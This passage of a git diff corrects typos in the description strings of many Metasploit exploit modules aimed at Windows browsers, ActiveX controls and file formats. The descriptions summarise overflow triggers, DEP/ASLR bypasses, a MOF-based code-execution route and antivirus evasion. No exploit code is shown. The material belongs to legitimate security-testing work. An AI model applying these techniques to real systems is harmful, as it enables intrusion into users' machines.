@@ class MetasploitModule < Msf::Exploit::Remote rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module - has been tested on Safari and Maxthon. Code execution can be acheived by first + has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index aac0992ff7..fd67c1afa1 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info(info, 'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference', 'Description' => %q{ - This module exploits a integer overflow in TeeChart Pro ActiveX control. When + This module exploits an integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of - TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the + TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c8acda7aa9..8dbb835630 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. - While the Tom Sawyer GET Extension Factory is installed with some versions of VMware + While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 16b9b36426..74fb2ee7ef 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject - ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- + ActiveX Control. If a long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index d3496d898d..4efaa2d865 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Winamp Playlist UNC Path Computer Name Overflow', 'Description' => %q{ This module exploits a vulnerability in the Winamp media player. - This flaw is triggered when a audio file path is specified, inside a + This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12. diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index b556a58675..e823d18b73 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be - exploited from the browser or the winamp client itself. + exploited from the browser or the Winamp client itself. }, 'Author' => 'MC', 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index be93a9c190..f17e6e490b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX - control in InterVideo WinDVD 7. By sending a overly long string + control in InterVideo WinDVD 7. By sending an overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 0b884daf6c..b69c9f884d 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote opt-in to ASLR. As such, this module should be reliable on all Windows versions. - The WMI Adminsitrative Tools are a standalone download & install (linked in the + The WMI Administrative Tools are a standalone download & install (linked in the references). }, diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 21d8c4da32..83de2ea8fa 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the - X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun + X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 25b3d6da7b..dacbde4f95 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX - Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string + Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 69a61dcbd4..f4f5de1970 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. - By sending a overly long string to the "Server()" method, and then calling + By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results. diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index b83e93a2a8..82bbcc2541 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These - files can be local files, but also file stored remotely for example on a file share. - Exploitation is limited by the fact that its is not possible for attackers to supply - command line options. + files can be local files, but also files stored remotely (on a file share, for example) + can be used. Exploitation is limited by the fact that it is not possible for attackers + to supply command line options. }, 'Author' => 'Yorick Koster ', 'References' => diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index 49b79010d8..1fa5321339 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges - of the user running the application . This module has been tested successfully on + of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 80a28ed8a2..643d6b5656 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various - Windows versions due a the hardcoded syscall number. + Windows versions due to a hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index f5ecab3566..b411f7b954 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe Reader ToolButton Use After Free', 'Description' => %q{ - This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 1298adb9f4..c2f2504e2a 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability found in Apple Quicktime. The flaw is - triggered when Quicktime fails to properly handle the data length for certain + This module exploits a vulnerability found in Apple QuickTime. The flaw is + triggered when QuickTime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the current user. Please note: Since an egghunter diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index bf1e3297e4..7e03983186 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Audiotran. + PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 597b63d501..2fca6c6c67 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded - PLS file within a browser when the PLS extention is registered to Audiotran. + PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module. }, diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index c5c522c35b..7d466420ce 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a - playlist file on to the stack, which may result aribitrary code execution under + playlist file on to the stack, which may result arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index d77b63f7a7..bc24157d7b 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit 'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow", 'Description' => %q{ This module exploits a stack-based buffer overflow on Beetel Connection Manager. The - vulnerability exists in the parising of the UserName parameter in the NetConfig.ini + vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP SP3 and Windows 7 SP1. }, diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index 86a0680b7f..f4df94d914 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CA Antivirus Engine CAB Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. - By creating a specially crafted CAB file, an an attacker may be able + By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index e6e068b02b..f9c0f711cd 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an - invalid read of an injectible address, thus allowing arbitrary code execution. + invalid read of an injectable address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7. }, diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index c81f162437..2ce52112f9 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data - on the stack in a insecure way. It results in arbitrary code execution under the + on the stack in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index 2ec583c7b7..cb33d3ef1d 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set - in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. }, diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index a6191aa48b..fe3d7691d4 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - DBR file within a browser, since the DBR extention is registered to DeepBurner. + DBR file within a browser, since the DBR extension is registered to DeepBurner. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 0bd6a579a2..3b14db3dd2 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, - and then copy it on the stack without any proper bounds checking, which casues a - buffer overflow, and results arbitrary code execution under the context of the user. + and then copy it on the stack without any proper bounds checking, which causes a + buffer overflow, and results in arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7. diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 90f519af7f..5651182f92 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control - (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's + This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control + (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's Documentation ApplicationXtender 5.4. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index d03f35da23..0b9cf634b0 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the - function ERM_convert_to_correct_webpath handles user provided data in a insecure + function ERM_convert_to_correct_webpath handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index 9b66759feb..bf27a30630 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function - rf_report_error handles user provided data in a insecure way. It results in + rf_report_error handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 0df68d115f..fd32c41ba7 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HTML Help Workshop 4.74 - By creating a specially crafted hhp file, an an attacker may be able + By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index 27becb3a0b..f73c16b86e 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow', 'Description' => %q{ - This module embeds an exploit into an ucompressed map file (.h3m) for + This module embeds an exploit into an uncompressed map file (.h3m) for Heroes of Might and Magic III. Once the map is started in-game, a - buffer overflow occuring when loading object sprite names leads to + buffer overflow occurring when loading object sprite names leads to shellcode execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index d019940329..bcb783a8e6 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must we provide a valid pointer at - 0x74 which is used as a argument for the called function at 0x675751ED as a id file + 0x74 which is used as an argument for the called function at 0x675751ED as an id file extension parameter. Once the caller regains control we will reach our RETURN. The Ret - instruction will be used to pop the overwritten saved return address which was currupted. + instruction will be used to pop the overwritten saved return address which was corrupted. This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform. diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index b8c077826b..ca331f261f 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IcoFX Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in version 2.1 - of IcoFX. The vulnerability exists while parsing .ICO files, where an specially + of IcoFX. The vulnerability exists while parsing .ICO files, where a specially crafted ICONDIR header providing an arbitrary long number of images in the file can be used to trigger the overflow when reading the ICONDIRENTRY structures. }, diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 69c7b6b75b..55d9ea8665 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. - By creating a specially crafted ipj file, an an attacker may be able + By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 25671a1821..3578da270b 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the - local system. However, if the victim machine is connected to a remote share ( - or something similiar), then it's also possible to execute arbitrary code. + local system. However, if the victim machine is connected to a remote share + (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine. diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 78737e1c96..90471410e1 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. + PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 2a628a4b61..2bde64298e 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in MJM Core Player 2011 - When opening a malicious s3m file in this applications, a stack buffer overflow can be + When opening a malicious s3m file in this application, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. }, diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 499ada665d..9d13c5f2a5 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack-based buffer overflow found in the handling of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently - targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer. + targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer. The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also - be done from the console with the mplayer "-sub" option. + be done from the console with the MPlayer "-sub" option. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 03aab1aec2..e5c0dbbf67 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code - exection. + execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing. diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 73db9b695e..d26da87e6a 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker - can get the control of the excution flow. This results aribrary code execution under + can get the control of the execution flow. This results in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 0514c39ea8..00b0a02650 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- - based buffer overflow. This results aribrary code execution under the context of - user the user. + based buffer overflow. This results in arbitrary code execution under the context of + the user. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 5ba12c0a2b..4d8220ad71 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -12,7 +12,7 @@ class 